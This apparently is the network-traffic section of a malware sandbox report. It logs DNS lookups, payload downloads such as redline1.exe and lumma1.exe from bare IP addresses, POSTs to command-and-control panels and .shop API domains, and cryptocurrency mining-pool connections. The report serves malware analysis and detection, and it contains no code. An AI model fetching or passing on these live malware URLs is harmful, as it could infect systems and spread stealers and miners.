                                                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                      User-Agent: 1
                                                                                      Host: 185.172.128.90
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                    • flag-us
                                                                                      DNS
                                                                                      90.128.172.185.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      90.128.172.185.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      xmr.2miners.com
                                                                                      850308.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      xmr.2miners.com
                                                                                      IN A
                                                                                      Response
                                                                                      xmr.2miners.com
                                                                                      IN A
                                                                                      162.19.139.184
                                                                                    • flag-us
                                                                                      DNS
                                                                                      67.65.42.5.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      67.65.42.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      184.139.19.162.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      184.139.19.162.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      184.139.19.162.in-addr.arpa
                                                                                      IN PTR
                                                                                      p062minerscom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      249.197.17.2.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      249.197.17.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      249.197.17.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      a2-17-197-249deploystaticakamaitechnologiescom
                                                                                    • flag-de
                                                                                      GET
                                                                                      http://185.172.128.90/cpa/name.php
                                                                                      Remote address:
                                                                                      185.172.128.90:80
                                                                                      Request
                                                                                      GET /cpa/name.php HTTP/1.1
                                                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                      User-Agent: 1
                                                                                      Host: 185.172.128.90
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                    • flag-us
                                                                                      DNS
                                                                                      172.210.232.199.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      172.210.232.199.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      22.236.111.52.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      22.236.111.52.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-de
                                                                                      GET
                                                                                      http://185.172.128.90/cpa/name.php
                                                                                      Remote address:
                                                                                      185.172.128.90:80
                                                                                      Request
                                                                                      GET /cpa/name.php HTTP/1.1
                                                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                      User-Agent: 1
                                                                                      Host: 185.172.128.90
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                    • flag-us
                                                                                      DNS
                                                                                      zeph-eu2.nanopool.org
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      Response
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      163.172.171.111
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      51.210.150.92
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      51.15.89.13
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      51.68.137.186
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      51.195.43.17
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      51.15.61.114
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      51.195.138.197
                                                                                    • flag-us
                                                                                      DNS
                                                                                      17.43.195.51.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      17.43.195.51.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      17.43.195.51.in-addr.arpa
                                                                                      IN PTR
                                                                                      vps-4c5eb1cavpsovhnet
                                                                                    • 204.79.197.237:443
                                                                                      https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949
                                                                                      tls, http2
                                                                                      2.6kB
                                                                                      9.1kB
                                                                                      19
                                                                                      16

                                                                                      HTTP Request

                                                                                      GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=531035994&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949

                                                                                      HTTP Response

                                                                                      204

                                                                                      HTTP Request

                                                                                      GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949

                                                                                      HTTP Response

                                                                                      204
                                                                                    • 88.221.83.193:443
                                                                                      https://www.bing.com/aes/c.gif?RG=4faef17f38be412fa1aa6a1874b8b20c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T134311Z&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038
                                                                                      tls, http2
                                                                                      1.5kB
                                                                                      5.4kB
                                                                                      17
                                                                                      12

                                                                                      HTTP Request

                                                                                      GET https://www.bing.com/aes/c.gif?RG=4faef17f38be412fa1aa6a1874b8b20c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T134311Z&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 5.42.96.141:80
                                                                                      http://5.42.96.141/go34ko8/index.php
                                                                                      http
                                                                                      explorku.exe
                                                                                      1.9kB
                                                                                      2.2kB
                                                                                      17
                                                                                      14

                                                                                      HTTP Request

                                                                                      POST http://5.42.96.141/go34ko8/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://5.42.96.141/go34ko8/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 88.221.83.193:443
                                                                                      https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
                                                                                      tls, http2
                                                                                      1.6kB
                                                                                      6.4kB
                                                                                      17
                                                                                      13

                                                                                      HTTP Request

                                                                                      GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 5.42.96.7:80
                                                                                      http://5.42.96.7/cost/random.exe
                                                                                      http
                                                                                      explorku.exe
                                                                                      226.3kB
                                                                                      6.6MB
                                                                                      4729
                                                                                      4738

                                                                                      HTTP Request

                                                                                      GET http://5.42.96.7/cost/sarra.exe

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET http://5.42.96.7/mine/amers.exe

                                                                                      HTTP Request

                                                                                      GET http://5.42.96.7/cost/random.exe
                                                                                    • 5.42.96.7:80
                                                                                      http://5.42.96.7/zamo7h/index.php
                                                                                      http
                                                                                      axplons.exe
                                                                                      207.8kB
                                                                                      6.1MB
                                                                                      4390
                                                                                      4379

                                                                                      HTTP Request

                                                                                      POST http://5.42.96.7/zamo7h/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://5.42.96.7/zamo7h/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET http://5.42.96.7/lend/alex.exe

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://5.42.96.7/zamo7h/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET http://5.42.96.7/lend/gold.exe

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://5.42.96.7/zamo7h/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET http://5.42.96.7/lend/redline1.exe

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://5.42.96.7/zamo7h/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://5.42.96.7/zamo7h/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET http://5.42.96.7/lend/swizzhis.exe

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://5.42.96.7/zamo7h/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET http://5.42.96.7/lend/lumma1.exe

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://5.42.96.7/zamo7h/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://5.42.96.7/zamo7h/index.php

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.39.216:443
                                                                                      https://zippyfinickysofwps.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.5kB
                                                                                      7.3kB
                                                                                      13
                                                                                      13

                                                                                      HTTP Request

                                                                                      POST https://zippyfinickysofwps.shop/api

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST https://zippyfinickysofwps.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 188.114.97.2:443
                                                                                      https://acceptabledcooeprs.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.3kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://acceptabledcooeprs.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 185.172.128.33:8970
                                                                                      keks.exe
                                                                                      5.1MB
                                                                                      108.6kB
                                                                                      3872
                                                                                      2246
                                                                                    • 104.21.20.88:443
                                                                                      https://obsceneclassyjuwks.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://obsceneclassyjuwks.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 77.221.151.47:80
                                                                                      http://77.221.151.47/install.exe
                                                                                      http
                                                                                      axplons.exe
                                                                                      162.6kB
                                                                                      4.6MB
                                                                                      3285
                                                                                      3283

                                                                                      HTTP Request

                                                                                      GET http://77.221.151.47/install.exe

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 185.215.113.67:26260
                                                                                      redline1.exe
                                                                                      5.3MB
                                                                                      75.7kB
                                                                                      3893
                                                                                      1598
                                                                                    • 104.21.30.191:443
                                                                                      https://miniaturefinerninewjs.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://miniaturefinerninewjs.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.53.146:443
                                                                                      https://plaintediousidowsko.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://plaintediousidowsko.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.44.201:443
                                                                                      https://sweetsquarediaslw.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://sweetsquarediaslw.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.40.92:443
                                                                                      https://holicisticscrarws.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.3kB
                                                                                      11
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://holicisticscrarws.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 172.67.186.30:443
                                                                                      https://boredimperissvieos.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.3kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://boredimperissvieos.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 49.13.229.86:80
                                                                                      RegAsm.exe
                                                                                      260 B
                                                                                      5
                                                                                    • 185.172.128.19:80
                                                                                      http://185.172.128.19/NewB.exe
                                                                                      http
                                                                                      axplons.exe
                                                                                      15.5kB
                                                                                      442.2kB
                                                                                      335
                                                                                      334

                                                                                      HTTP Request

                                                                                      GET http://185.172.128.19/NewB.exe

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 172.67.162.147:443
                                                                                      https://smallelementyjdui.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.6kB
                                                                                      7.4kB
                                                                                      14
                                                                                      14

                                                                                      HTTP Request

                                                                                      POST https://smallelementyjdui.shop/api

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST https://smallelementyjdui.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 185.172.128.19:80
                                                                                      http://185.172.128.19/ghsdh39s/index.php
                                                                                      http
                                                                                      NewB.exe
                                                                                      97.4kB
                                                                                      2.8MB
                                                                                      2070
                                                                                      2061

                                                                                      HTTP Request

                                                                                      POST http://185.172.128.19/ghsdh39s/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://185.172.128.19/ghsdh39s/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://185.172.128.19/ghsdh39s/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://185.172.128.19/ghsdh39s/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://185.172.128.19/ghsdh39s/index.php

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET http://185.172.128.19/FirstZ.exe

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      POST http://185.172.128.19/ghsdh39s/index.php

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 5.42.67.23:80
                                                                                      http://5.42.67.23/dl.php?pub=mixeight
                                                                                      http
                                                                                      NewB.exe
                                                                                      10.8kB
                                                                                      299.7kB
                                                                                      233
                                                                                      227

                                                                                      HTTP Request

                                                                                      GET http://5.42.67.23/dl.php?pub=mixeight

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.95.16:443
                                                                                      https://sofaprivateawarderysj.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://sofaprivateawarderysj.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 77.221.151.47:8080
                                                                                      PiercingNetLink.exe
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 172.67.141.60:443
                                                                                      https://lineagelasserytailsd.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://lineagelasserytailsd.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 172.67.205.185:443
                                                                                      https://tendencyportionjsuk.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.3kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://tendencyportionjsuk.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.50.137:443
                                                                                      https://headraisepresidensu.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.3kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://headraisepresidensu.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 5.101.50.183:80
                                                                                      http://file-file-host6.com/downloads/toolspub1.exe
                                                                                      http
                                                                                      NewB.exe
                                                                                      8.1kB
                                                                                      237.1kB
                                                                                      175
                                                                                      173

                                                                                      HTTP Request

                                                                                      GET http://file-file-host6.com/downloads/toolspub1.exe

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.48.123:443
                                                                                      https://appetitesallooonsj.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      11
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://appetitesallooonsj.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 172.67.187.204:443
                                                                                      https://parrotflight.com/4767d2e713f2021e8fe856e3ea638b58.exe
                                                                                      tls, http
                                                                                      NewB.exe
                                                                                      1.0kB
                                                                                      6.7kB
                                                                                      14
                                                                                      10

                                                                                      HTTP Request

                                                                                      GET https://parrotflight.com/4767d2e713f2021e8fe856e3ea638b58.exe

                                                                                      HTTP Response

                                                                                      307
                                                                                    • 188.114.96.2:443
                                                                                      https://minorittyeffeoos.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://minorittyeffeoos.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.92.157:443
                                                                                      https://prideconstituiiosjk.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://prideconstituiiosjk.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.92.190:443
                                                                                      https://junglethomas.com/ab6c5b0141ae7b82616164b5c7473c92/4767d2e713f2021e8fe856e3ea638b58.exe
                                                                                      tls, http
                                                                                      NewB.exe
                                                                                      191.8kB
                                                                                      4.5MB
                                                                                      3224
                                                                                      3214

                                                                                      HTTP Request

                                                                                      GET https://junglethomas.com/ab6c5b0141ae7b82616164b5c7473c92/4767d2e713f2021e8fe856e3ea638b58.exe

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 77.221.151.47:8080
                                                                                      PiercingNetLink.exe
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 185.172.128.90:80
                                                                                      http://185.172.128.90/cpa/name.php
                                                                                      http
                                                                                      dl.exe
                                                                                      578 B
                                                                                      92 B
                                                                                      4
                                                                                      2

                                                                                      HTTP Request

                                                                                      GET http://185.172.128.90/cpa/name.php
                                                                                    • 77.221.151.47:8080
                                                                                      PiercingNetLink.exe
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:9090
                                                                                      GameSyncLinks.exe
                                                                                      404 B
                                                                                      608 B
                                                                                      6
                                                                                      7
                                                                                    • 5.42.65.67:48396
                                                                                      trf.exe
                                                                                      5.0MB
                                                                                      69.3kB
                                                                                      3794
                                                                                      1406
                                                                                    • 162.19.139.184:2222
                                                                                      xmr.2miners.com
                                                                                      850308.exe
                                                                                      1.1kB
                                                                                      1.9kB
                                                                                      11
                                                                                      10
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 49.13.229.86:80
                                                                                      260 B
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      399 B
                                                                                      268 B
                                                                                      6
                                                                                      5
                                                                                    • 49.13.229.86:80
                                                                                      260 B
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 185.172.128.90:80
                                                                                      http://185.172.128.90/cpa/name.php
                                                                                      http
                                                                                      578 B
                                                                                      92 B
                                                                                      4
                                                                                      2

                                                                                      HTTP Request

                                                                                      GET http://185.172.128.90/cpa/name.php
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 49.13.229.86:80
                                                                                      260 B
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:9090
                                                                                      2.3kB
                                                                                      268 B
                                                                                      6
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 185.172.128.90:80
                                                                                      http://185.172.128.90/cpa/name.php
                                                                                      http
                                                                                      532 B
                                                                                      92 B
                                                                                      3
                                                                                      2

                                                                                      HTTP Request

                                                                                      GET http://185.172.128.90/cpa/name.php
                                                                                    • 49.13.229.86:80
                                                                                      260 B
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 51.195.43.17:10943
                                                                                      zeph-eu2.nanopool.org
                                                                                      tls
                                                                                      1.4kB
                                                                                      3.1kB
                                                                                      8
                                                                                      6
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 8.8.8.8:53
                                                                                      g.bing.com
                                                                                      dns
                                                                                      56 B
                                                                                      151 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      g.bing.com

                                                                                      DNS Response

                                                                                      204.79.197.237
                                                                                      13.107.21.237

                                                                                    • 8.8.8.8:53
                                                                                      196.249.167.52.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      147 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      196.249.167.52.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      240.197.17.2.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                      135 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      240.197.17.2.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      237.197.79.204.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      143 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      237.197.79.204.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      95.221.229.192.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      144 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      95.221.229.192.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      14.160.190.20.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      158 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      14.160.190.20.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      193.83.221.88.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      137 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      193.83.221.88.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      88.156.103.20.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      158 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      88.156.103.20.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      141.96.42.5.in-addr.arpa
                                                                                      dns
                                                                                      70 B
                                                                                      130 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      141.96.42.5.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      7.96.42.5.in-addr.arpa
                                                                                      dns
                                                                                      68 B
                                                                                      128 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      7.96.42.5.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      133.211.185.52.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      147 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      133.211.185.52.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      228.249.119.40.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      159 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      228.249.119.40.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      zippyfinickysofwps.shop
                                                                                      dns
                                                                                      RegAsm.exe
                                                                                      69 B
                                                                                      101 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      zippyfinickysofwps.shop

                                                                                      DNS Response

                                                                                      104.21.39.216
                                                                                      172.67.148.231

                                                                                    • 8.8.8.8:53
                                                                                      acceptabledcooeprs.shop
                                                                                      dns
                                                                                      RegAsm.exe
